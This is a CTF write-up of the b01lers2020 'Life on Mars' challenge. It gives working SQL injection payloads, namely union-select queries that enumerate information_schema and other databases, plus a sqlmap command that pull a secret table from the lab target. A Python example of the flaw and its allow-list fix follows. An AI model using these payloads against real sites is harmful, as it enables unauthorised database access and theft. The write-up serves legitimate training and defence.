[b01lers2020]Life on Mars
2022-08-03 22:03:00 【New Reading of the Classic of Tea.】
A quick look at the page turns up nothing important, F12 found nothing, and the packet capture found GET /query?search=&amazonis_planitia&{}&_=1659321817406
Clicking on different titles changes the amazonis_planitia part accordingly. Try visiting that URL directly and a page of data appears.
It returns a lot of data, so try a union query: /query?search=amazonis_planitia union select 1,2, and find that the output is echoed
Check the database: /query?search=amazonis_planitia union select version(),database()
Check the table: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='aliens'
After checking, I found that the echoed values are the titles from the first page. Query the fields of the table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='amazonis_planitia', nothing special
Use the sqlmap tool to scan it
sqlmap download: sqlmap (automatic SQL injection and database takeover tool)
python2 sqlmap.py -u http://xxxxxxxx.node4.buuoj.cn:81/query?search=amazonis_planitia --dbs
I found that there are three databases behind the web page, and you can check it yourself: /query?search=amazonis_planitia union select 1,group_concat(schema_name) from information_schema.SCHEMATA, there are indeed three databases
I have already queried aliens and found nothing, so continue by querying the tables of alien_code: /query?search=amazonis_planitia union select 1,group_concat(table_name) from information_schema.tables where table_schema='alien_code'
Query the fields of the code table: /query?search=amazonis_planitia union select 1,group_concat(column_name) from information_schema.columns where table_name='code'
Check the content: /query?search=amazonis_planitia union select group_concat(id),group_concat(code) from alien_code.code
This is the end, let's spread the flowers
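The root cause behind every step above, shown with its fix as an added example (not code from the original post or the challenge). It assumes the server builds `SELECT * FROM <search>`, uses sqlite3 as a stand-in for the MySQL backend, and all rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed stand-in data; only the names amazonis_planitia and code
    # come from the write-up, the columns and rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE amazonis_planitia (id INTEGER, name TEXT)")
    db.execute("CREATE TABLE code (id INTEGER, code TEXT)")
    db.execute("INSERT INTO amazonis_planitia VALUES (1, 'constructed row')")
    db.execute("INSERT INTO code VALUES (0, 'constructed-secret')")
    return db

def query_vulnerable(db, search):
    # Assumed shape of the flawed handler: the parameter lands in FROM,
    # so anything after the table name becomes part of the statement.
    return db.execute("SELECT * FROM " + search).fetchall()

# A table name cannot be bound as a ? placeholder, so parameterised
# queries do not help here; map the input onto a fixed allow-list instead.
ALLOWED_TABLES = {"amazonis_planitia"}  # hypothetical list of public tables

def query_hardened(db, search):
    if search not in ALLOWED_TABLES:
        raise ValueError("unknown table: %r" % (search,))
    # The identifier is now one of our own constants, not user text.
    return db.execute('SELECT * FROM "%s"' % search).fetchall()

if __name__ == "__main__":
    db = make_db()
    probe = "amazonis_planitia union select 1,2"  # probe from the write-up
    print(query_vulnerable(db, probe))
    try:
        query_hardened(db, probe)
    except ValueError as exc:
        print("rejected:", exc)
    print(query_hardened(db, "amazonis_planitia"))
```

Running the application's database account with SELECT rights on its own schema only would additionally keep a query like this from reaching other databases such as alien_code.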